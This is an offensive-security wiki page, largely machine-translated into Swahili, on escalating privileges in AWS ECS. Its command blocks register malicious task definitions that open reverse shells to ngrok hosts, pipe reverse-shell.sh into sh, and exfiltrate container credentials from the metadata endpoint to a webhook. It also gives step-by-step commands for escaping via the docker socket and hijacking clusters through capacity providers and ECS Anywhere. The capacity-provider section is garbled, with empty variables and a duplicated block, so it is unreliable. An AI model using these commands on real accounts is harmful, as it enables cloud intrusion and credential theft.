AWS - ECS Privesc

Reading time: 17 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

ECS

Taarifa zaidi kuhusu ECS katika:

AWS - ECS Enum

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`

Mshambuliaji anayetumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask ndani ya ECS anaweza kutengeneza task definition mpya yenye container hatari ambayo inaiba cheti za metadata na kuendesha.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Unda webhook kwa tovuti kama webhook.site

bash


# Create file container-definition.json
[
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": [
"CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
]
}
]

# Run task definition, uploading the .json file
aws ecs register-task-definition \
--family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 \
--memory 512 \
--requires-compatibilities FARGATE \
--container-definitions file://container-definition.json

# Check the webhook for a response

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Athari Inayowezekana: Direct privesc kwa ECS role tofauti.

`iam:PassRole`,`ecs:RunTask`

Mshambuliaji mwenye ruhusa za iam:PassRole na ecs:RunTask anaweza kuanzisha task mpya ya ECS na kubadilisha execution role, task role pamoja na thamani za container's command. Amri ya CLI ya ecs run-task ina flag ya --overrides ambayo inaruhusu kubadilisha wakati wa utekelezaji executionRoleArn, taskRoleArn na container's command bila kugusa task definition.

Roles za IAM zilizobainishwa kwa taskRoleArn na executionRoleArn zinapaswa kumwamini/kuruhusu ecs-tasks.amazonaws.com kuziteuwa katika trust policy yao.

Aidha, mshambuliaji anahitaji kujua:

Jina la ECS cluster
VPC Subnet
Security group (Ikiwa hakuna security group imetajwa, ile ya default itatumika)
Task Definition Name na revision
Jina la Container

bash

aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Katika kipande cha msimbo hapo juu mwizi anabadilisha tu thamani ya taskRoleArn. Hata hivyo, mwizi lazima awe na ruhusa ya iam:PassRole juu ya taskRoleArn iliyotajwa katika amri na executionRoleArn iliyotajwa katika ufafanuzi wa task ili shambulio lifanyike.

Iwapo role ya IAM ambayo mwizi anaweza kuipitisha ina haki za kutosha kuvuta image ya ECR na kuanzisha task ya ECS (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer,ecr:BatchGetImage,ecr:GetAuthorizationToken) basi mwizi anaweza kubainisha role ile ile ya IAM kwa executionRoleArn na taskRoleArn katika amri ya ecs run-task.

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Athari Inayowezekana: Direct privesc to any ECS task role.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`

Kama katika mfano uliopita, mshambuliaji anayefaidisha ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask katika ECS anaweza kuunda task definition mpya yenye container yenye madhara inayopora metadata credentials na kuendesha.
Hata hivyo, katika kesi hii, inahitajika container instance ili kuendesha task definition yenye madhara.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa role yoyote ya ECS.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`

Kama ilivyo kwenye mfano uliopita, mshambuliaji akitumia vibaya idhini za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService katika ECS anaweza kuunda task definition mpya yenye malicious container inayoiiba metadata credentials na kuendesha kwa kuunda service mpya yenye angalau task moja inayoendesha.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Athari Inayowezekana: Privesc ya moja kwa moja kwa ECS role yoyote.

`iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`

Kwa kweli, kwa ruhusa hizo tu inawezekana kutumia overrides ili kutekeleza amri za aina yoyote ndani ya container zikiwa na role yoyote, kwa kitu kama:

bash

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potential Impact: Privesc moja kwa moja kwa ECS role yoyote.

`ecs:RegisterTaskDefinition`, `(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Hali hii ni kama zile zilizotangulia lakini bila ruhusa ya iam:PassRole.
Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha container chochote, hata ikiwa haina role, unaweza run a privileged container to escape hadi node na steal the EC2 IAM role pamoja na the other ECS containers roles zinazokimbia kwenye node.
Unaweza hata kuforce other tasks to run inside the EC2 instance uliouwezesha kuingilia ili kuiba credentials zao (kama ilivyojadiliwa katika Privesc to node section).

warning

Shambulio hili linawezekana tu ikiwa ECS cluster is using EC2 instances na sio Fargate.

bash

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

`ecs:ExecuteCommand`, `ecs:DescribeTasks,``(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Mshambuliaji aliye na ecs:ExecuteCommand, ecs:DescribeTasks anaweza kutekeleza amri ndani ya container inayofanya kazi na kuondoa IAM role iliyoshikamana nayo (unahitaji describe permissions kwa sababu ni lazima kuendesha aws ecs execute-command).
Hata hivyo, ili kufanya hivyo, instance ya container inahitaji kuwa inaendesha ExecuteCommand agent (ambayo kwa chaguo-msingi haipo).

Hivyo, mshambuliaji anaweza kujaribu:

Jaribu kuendesha amri katika kila container inayofanya kazi

bash

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

Kama ana ecs:RunTask, endesha task kwa aws ecs run-task --enable-execute-command [...]
Kama ana ecs:StartTask, endesha task kwa aws ecs start-task --enable-execute-command [...]
Kama ana ecs:CreateService, unda service kwa aws ecs create-service --enable-execute-command [...]
Kama ana ecs:UpdateService, sasisha service kwa aws ecs update-service --enable-execute-command [...]

Unaweza kupata mifano ya chaguzi hizo katika sehemu za awali za ECS privesc.

Athari Inayoweza Kutokea: Privesc kwa role tofauti iliyounganishwa na containers.

`ssm:StartSession`

Angalia katika ssm privesc page jinsi unavyoweza kutumia vibaya ruhusa hii ili privesc kwa ECS:

AWS - SSM Privesc

`iam:PassRole`, `ec2:RunInstances`

Angalia katika ec2 privesc page jinsi unavyoweza kutumia vibaya ruhusa hizi ili privesc kwa ECS:

AWS - EC2 Privesc

`ecs:RegisterContainerInstance`, `ecs:DeregisterContainerInstance`, `ecs:StartTask`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizi anaweza kwa uwezekano kusajili EC2 instance katika ECS cluster na kuendesha tasks juu yake. Hii inaweza kumruhusu mshambuliaji kutekeleza msimbo wowote ndani ya muktadha wa tasks za ECS.

TODO: Je, inawezekana kusajili instance kutoka kwa akaunti tofauti ya AWS ili tasks ziendeshwe chini ya mashine zinazosimamiwa na mshambuliaji??

`ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`

note

TODO: Jaribu hili

Mshambuliaji mwenye ruhusa ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda malicious task set kwa service ya ECS iliyopo na kusasisha primary task set. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya service.

bash

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Athari Inayowezekana: Tekeleza msimbo wowote katika huduma iliyoharibiwa, jambo linaloweza kuathiri utendaji wake au kuondoa data nyeti kwa siri.

Marejeo

https://ruse.tech/blogs/ecs-attack-methods

Kunyang'anya Upangaji wa ECS kupitia Capacity Provider ya Hasidi (uchukuzi wa EC2 ASG)

Mshambulizi mwenye ruhusa za kusimamia ECS capacity providers na kusasisha huduma anaweza kuunda EC2 Auto Scaling Group anayedhibiti, kuiweka ndani ya ECS Capacity Provider, kuihusisha na cluster lengwa, na kuhama huduma ya mwathiriwa ili itumie provider hii. Kisha tasks zitawekwa kwenye instances za EC2 zinazodhibitiwa na mshambuliaji, ikiruhusu ufikiaji wa ngazi ya OS kwa kukagua containers na kuiba credentials za task role.

Commands (us-east-1):

Mahitaji ya awali
Create Launch Template for ECS agent to join target cluster
Create Auto Scaling Group
Create Capacity Provider from the ASG
Associate the Capacity Provider to the cluster (optionally as default)
Migrate a service to your provider
Verify tasks land on attacker instances
Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.
Cleanup

Athari Inayowezekana: Node za EC2 zinazoendeshwa na mshambuliaji zinapokea tasks za mwathiriwa, kuruhusu ufikiaji wa ngazi ya OS kwenye containers na wizi wa credentials za IAM za task.

Amri hatua kwa hatua (nakili/paste)

export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true
VPC=vpc-18e6ac62
SUBNETS=
AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=
ASG_ARN=
CP_NAME=htcp-8797
aws ecs create-capacity-provider --name  --auto-scaling-group-provider "autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
aws ecs put-cluster-capacity-providers --cluster "" --capacity-providers  --default-capacity-provider-strategy capacityProvider=,weight=1
SVC=
Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service --cluster "" --service "" --capacity-provider-strategy capacityProvider=,weight=1 --force-new-deployment
TASK=
CI=
aws ecs describe-container-instances --cluster "" --container-instances "" --query containerInstances[0].ec2InstanceId --output text

Kufungua Njia ya Nyuma kwenye compute ndani ya cluster kupitia ECS Anywhere EXTERNAL registration

Tumia vibaya ECS Anywhere kusajili mwenyeji unaodhibitiwa na mshambuliaji kama EXTERNAL container instance katika cluster ya mwathiriwa ya ECS na kuendesha tasks kwenye mwenyeji huyo ukitumia privileged task na execution roles. Hii inatoa udhibiti wa ngazi ya OS juu ya mahali tasks zinaendeshwa (kompyuta yako mwenyewe) na kuruhusu wizi wa credentials/data kutoka kwa tasks na volumes zilizoambatishwa bila kugusa capacity providers au ASGs.

Ruhusa zinazohitajika (mfano minimal):
ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)
logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
Athari: Endesha containers yoyote ukiwa umechagua taskRoleArn kwenye mwenyeji wa mshambuliaji; toa credentials za task-role kutoka 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; pata ufikiaji wa volumes zozote zilizo montwa na tasks; ni stealthier kuliko kuingilia capacity providers/ASGs.

Hatua

Unda/au tambua cluster (us-east-1)

bash

aws ecs create-cluster --cluster-name ht-ecs-anywhere

Unda role ya ECS Anywhere na uanzishaji wa SSM (kwa instance ya on-prem/EXTERNAL)

bash

aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)

Tayarisha mwenyeji wa mshambuliaji na ujiandikishe moja kwa moja kama EXTERNAL (mfano: EC2 ndogo ya AL2 kama “on‑prem”)

user-data.sh

bash

#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1

bash

AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID

Thibitisha EXTERNAL container instance imejiunga

bash

aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances <ci-arn> --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external

Unda task/execution roles, sajili EXTERNAL task definition, na endesha kwenye attacker host

bash

# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role

# task def (EXTERNAL launch)
cat > td-external.json << 'JSON'
{
"family": "ht-external",
"requiresCompatibilities": [ "EXTERNAL" ],
"networkMode": "bridge",
"memory": "256",
"cpu": "128",
"executionRoleArn": "arn:aws:iam::<account-id>:role/ht-ecs-task-exec",
"taskRoleArn": "arn:aws:iam::<account-id>:role/ht-ecs-task-role",
"containerDefinitions": [
{"name":"steal","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["REL=\$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2\$REL; sleep 600"],
"memory": 128,
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/anywhere","awslogs-stream-prefix":"steal"}}
}
]
}
JSON
aws logs create-log-group --log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition --cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances --cluster ht-ecs-anywhere --query 'containerInstanceArns[0]' --output text)
aws ecs start-task --cluster ht-ecs-anywhere --task-definition ht-external \
--container-instances $CI

Kutoka hapa unadhibiti host inayotekeleza tasks. Unaweza kusoma task logs (ikiwa awslogs) au kufanya exec moja kwa moja kwenye host ili exfiltrate credentials/data kutoka kwa tasks zako.

Mfano wa amri (placeholders)

Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.

Amri (us-east-1):

Mahitaji ya awali
Unda Launch Template kwa ajili ya ECS agent kujiunga na target cluster
Unda Auto Scaling Group
Unda Capacity Provider kutoka kwa ASG
Husisha Capacity Provider na cluster (hiari kama default)
Hamisha service kwa provider yako
Thibitisha tasks zinaenda kwenye attacker-controlled EC2 instances
Hiari: Kutoka kwenye EC2 node, tumia docker exec ndani ya target containers na soma http://169.254.170.2 kupata task role credentials.
Usafishaji

Madhara Yanayowezekana: EC2 nodes zinazodhibitiwa na attacker zitapokea victim tasks, kuruhusu OS-level access kwa containers na wizi wa task IAM role credentials.

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud